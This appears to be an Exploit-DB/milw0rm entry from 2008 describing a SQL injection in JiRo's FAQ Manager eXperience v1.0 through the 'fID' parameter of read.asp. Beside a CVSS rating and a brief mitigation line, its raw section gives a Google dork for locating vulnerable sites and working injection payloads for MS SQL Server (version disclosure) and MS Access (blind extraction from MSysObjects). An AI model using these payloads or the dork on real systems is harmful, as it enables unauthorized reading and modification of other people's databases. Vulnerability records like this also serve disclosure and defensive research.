JiRoÂ´s FAQ Manager eXperience

vendor:

by:

Underz0ne Crew

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: JiRoÂ´s FAQ Manager eXperience

Affected Version From: v 1.0

Affected Version To: v 1.0

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: MS SQL Server, MS Access

2008

JiRoÂ´s FAQ Manager eXperience

The vulnerability exists due to insufficient sanitization of user-supplied input passed via the 'fID' parameter to '/read.asp' script. A remote attacker can execute arbitrary SQL commands in application's database, cause denial of service, access or modify sensitive data, exploit various vulnerabilities in the underlying SQL server software, etc.

Mitigation:

Input validation should be used to prevent SQL injection attacks.

Source

Exploit-DB raw data:

[+] Script Name     : JiRoÂ´s FAQ Manager eXperience
[+] Version         : v 1.0
[+] Price           : _ Single Website License 34.95 $
                      _ 2 Websites License 62.95 $
                      _ 5 Websites License 139.95 $
[+] Author          : Underz0ne Crew
[+] Home            : http://www.underz0ne.net
[+] Script In short : ('JiRos FAQ Management System is an essential 
element for any webmaster, providing your customers with answers to 
specific questions on-line 24 hours a day, 7 days a week. Build a 
complete knowledge base, adding articles and creating your own topic 
based FAQ system using our feature packed administration facility ')
[+] Dork            : inurl:"read.asp?fID="

--//--> Exploit :

read.asp?fID={SQL}

__--> MS SQL Server : convert(int,(select+@@version));

__--> MS Access     : IIF((select%20mid(last(Name),1,1)%20from%20(select%20top%2010%20Namee%20from%20MSysObjects))='a',0,'Bingo')%00

--//--> 

# milw0rm.com [2008-06-08]